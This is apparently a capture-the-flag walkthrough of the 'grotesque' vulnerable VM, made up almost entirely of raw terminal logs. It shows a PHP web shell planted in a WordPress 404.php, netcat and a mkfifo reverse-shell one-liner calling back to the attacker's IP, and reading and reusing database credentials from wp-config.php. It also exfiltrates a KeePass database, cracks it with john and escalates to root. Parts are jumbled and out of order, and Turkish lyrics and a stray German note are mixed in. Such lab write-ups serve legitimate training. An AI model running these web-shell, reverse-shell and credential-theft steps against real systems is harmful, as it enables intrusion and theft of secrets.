Initial Access
┌──(root㉿cyber)-[~]
└─# unzip /home/cyber/Downloads/vvmlist.zip
Archive: /home/cyber/Downloads/vvmlist.zip
creating: vvmlist.github.io/
extracting: vvmlist.github.io/.gitattributes
extracting: vvmlist.github.io/.gitignore
extracting: vvmlist.github.io/.travis.yml
extracting: vvmlist.github.io/.yamllint
creating: vvmlist.github.io/assets/
extracting: vvmlist.github.io/assets/logo.png
┌──(root㉿cyber)-[/home/cyber/Downloads/vvm/vvmlist.github.io]
└─# ll
insgesamt 224
drwxr-xr-x 2 root root 4096 18. Jan 2021 assets
-rw-r--r-- 1 root root 1694 16. Jan 2021 changelog.txt
-rw-r--r-- 1 root root 237 16. Jan 2021 _config.yml
drwxr-xr-x 2 root root 4096 16. Jan 2021 _data
-rw-r--r-- 1 root root 142 16. Jan 2021 functions.md
-rw-r--r-- 1 root root 44 16. Jan 2021 Gemfile
-rw-r--r-- 1 root root 1540 16. Jan 2021 Gemfile.lock
drwxr-xr-x 2 root root 4096 16. Jan 2021 _includes
-rw-r--r-- 1 root root 113 18. Jan 2021 index.md
drwxr-xr-x 2 root root 4096 16. Jan 2021 _layouts
-rw-r--r-- 1 root root 35149 16. Jan 2021 LICENSE
-rw-r--r-- 1 root root 35149 16. Jan 2021 license.txt
-rw-r--r-- 1 root root 185 16. Jan 2021 Makefile
drwxr-xr-x 2 root root 4096 16. Jan 2021 scripts
-rw-r--r-- 1 root root 92180 18. Jan 2021 sshpasswd.png
drwxr-xr-x 2 root root 12288 18. Jan 2021 _vvmlist
┌──(root㉿cyber)-[/home/cyber/Downloads/vvm/vvmlist.github.io]
└─# cat _vvmlist/* | sort | uniq
dns:
docker:
driftingblues3:
dropzone:
e:
enterprise:
"escalate_linux 1":
europa:
finger:
fluxcapacitor:
forest:
forwardslash:
for wordpress, it's on port 80/lyricsblog:
Error: The password you entered for the
username erdalkomurcu is incorrect.
also check your line endings ;)
Lost your password?
┌──(root㉿cyber)-[~]
└─# vi grotesque.txt
┌──(root㉿cyber)-[~]
└─# cat grotesque.txt
Çaresiz derdimin sebebi belli
Dermanı yaramda arama doktor
Şifa bulmaz gönlüm senin elinden
Boşuna benimle uğraşma doktor
Aşk yarasıdır bu ilaç kapatmaz
Derdin teselli beni avutmaz
Dermanı yardadır sende bulunmaz
Boşuna benimle uğraşma doktor
Dokunma benim gönül yarama
Dokunma doktor
Bedenimde değil kalbimde derdim
Tek alışkanlığım bir zalim sevdim
Sen çekil yanımdan sevdiğim gelsin
Boşuna zamanı harcama doktor
┌──(root㉿cyber)-[~]
└─# cat grotesque.txt -n
1 Çaresiz derdimin sebebi belli
2 Dermanı yaramda arama doktor
3 Şifa bulmaz gönlüm senin elinden
4 Boşuna benimle uğraşma doktor
5
6 Aşk yarasıdır bu ilaç kapatmaz
7 Derdin teselli beni avutmaz
8 Dermanı yardadır sende bulunmaz
9 Boşuna benimle uğraşma doktor
10 Dokunma benim gönül yarama
11 Dokunma doktor
12
13 Bedenimde değil kalbimde derdim
14 Tek alışkanlığım bir zalim sevdim
15 Sen çekil yanımdan sevdiğim gelsin
16 Boşuna zamanı harcama doktor
┌──(root㉿cyber)-[~]
└─# md5sum grotesque.txt
bc78c6ab38e114d6135409e44f7cdda2 grotesque.txt
string="Hello, World!"
lowercase_string="${string,,}"
echo "$lowercase_string"
password
should
be
uppercase
bc78c6ab38e114d6135409e44f7cdda2
BC78C6AB38E114D6135409E44F7CDDA2
Twenty Fifteen: 404 Template (404.php)
Select theme to edit:
Theme Files
Selected file content:
system($_GET['cmd']);
File edited successfully.
404.php
archive.php
author-bio.php
comments.php
content-link.php
content-none.php
content-page.php
content-search.php
content.php
css
footer.php
functions.php
genericons
header.php
image.php
inc
index.php
js
page.php
readme.txt
rtl.css
screenshot.png
search.php
sidebar.php
single.php
style.css
┌──(root㉿cyber)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
┌──(root㉿cyber)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.118] 34408
bash: cannot set terminal process group (524): Inappropriate ioctl for device
bash: no job control in this shell
www-data@grotesque:/var/www/html/lyricsblog/wp-content/themes/twentyfifteen$
www-data@grotesque:/var/www$ cat html/lyricsblog/wp-config.php
define( 'DB_NAME', 'wordpress_db' );
/ MySQL database username
define( 'DB_USER', 'raphael' );
/ MySQL database password
define( 'DB_PASSWRD', '_double_trouble_' );
/ MySQL hostname */
define( 'DB_HST', 'localhost' );
www-data@grotesque:/var/www$ ls /home/
raphael
www-data@grotesque:/var/www$ su raphael
~
Password: _double_trouble_
raphael@grotesque:/var/www$
raphael@grotesque:/var/www$ cd ~
raphael@grotesque$ ls
user.txt vvmlist.github.io
raphael@grotesque$ cat user.txt
F6ACB21652E095630BB1BEBD1E587FE7
raphael@grotesque$ cp .kdbx /tmp/chat.kdbx
raphael@grotesque$ cd /tmp/
raphael@grotesque:/tmp$ ls
chat.kdbx
┌──(root㉿cyber)-[~]
└─# nc -lv 5554 > chat.kdbx
5554: inverse host lookup failed: Unknown host
listening on [any] 40053 ...
raphael@grotesque:/tmp$ nc chat.kdbx < 192.168.2.199 5554
bash: 192.168.2.199: No such file or directory
raphael@grotesque:/tmp$ nc -N 192.168.2.199 5554 < chat.kdbx
nc: invalid option -- 'N'
nc -h for help
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > set lhost eth0
msf6 exploit(multi/handler) > run
[*] Using configured payload generic/shell_reverse_tcp
lport => 5555
lhost => eth0
[*] Started reverse TCP handler on 192.168.2.199:5555
raphael@grotesque:/tmp$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 5555 >/tmp/f
rm: cannot remove '/tmp/f': No such file or directory
[*] Command shell session 1 opened (192.168.2.199:5555 -> 192.168.2.118:45234) at 2024-01-31 23:47:44 +0100
Privilege Escalation
msf6 exploit(multi/handler) > use multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set lport 5552
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
msf6 post(multi/manage/shell_to_meterpreter) > run
lport => 5552
session => 1
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.2.199:5552
[*] Sending stage (1017704 bytes) to 192.168.2.118
[*] Meterpreter session 2 opened (192.168.2.199:5552 -> 192.168.2.118:59188) at 2024-01-31 23:48:45 +0100
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > download /tmp/chat.kdbx /root/
[*] Downloading: /tmp/chat.kdbx -> /root/chat.kdbx
[*] Downloaded 2.12 KiB of 2.12 KiB (100.0%): /tmp/chat.kdbx -> /root/chat.kdbx
[*] Completed : /tmp/chat.kdbx -> /root/chat.kdbx
┌──(root㉿cyber)-[~]
└─# mv chat.kdbx /media/sf_15._keypasscracking
┌──(root㉿cyber)-[~]
└─# keepass2john chat.kdbx > flag
┌──(root㉿cyber)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt flag
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 16 penMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
chatter (chat)
1g 0:00:00:00 DNE (2024-02-01 00:05) 11.11g/s 711.1p/s 711.1c/s 711.1C/s s13!34g$3FVA5e@ed..carlos
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
meterpreter > shell
Process 21727 created.
Channel 3 created.
id
uid=1000(raphael) gid=1000(raphael) groups=1000(raphael)
find / -type f -perm -4000 -ls 2>/dev/null
25269 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
21909 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
16365 12 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
81 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
4028 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
76 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
4030 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
3547 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
3694 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
79 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
77 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
msf6 post(multi/manage/shell_to_meterpreter) > search suggester
Matching Modules
# Name Disclosure Date Rank Check Description
- - - -- --
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.2.118 - Collecting local exploits for x86/linux...
keepass 4 Einträge
secretservice
.:.yarak.:.
.:.subjective.:.
rockyou.txt
su root
Password: .:.subjective.:.
id
uid=0(root) gid=0(root) groups=0(root)
ls
logdel2
root.txt
vvmlist.sh
cat root.txt
AF7DD472654CBBCF87D3D7F509CB9862
Flags
cat user.txt
F6ACB21652E095630BB1BEBD1E587FE7
cat root.txt
AF7DD472654CBBCF87D3D7F509CB9862
arp-scan -l
, um alle Geräte im lokalen Netzwerk zu identifizieren. Dies hilft uns, die IP-Adresse des Zielsystems (192.168.2.118) und den Hersteller der Netzwerkkarte (PCS Systemtechnik GmbH) zu ermitteln. Diese Information ist nützlich für die weitere Analyse und Zielfindung.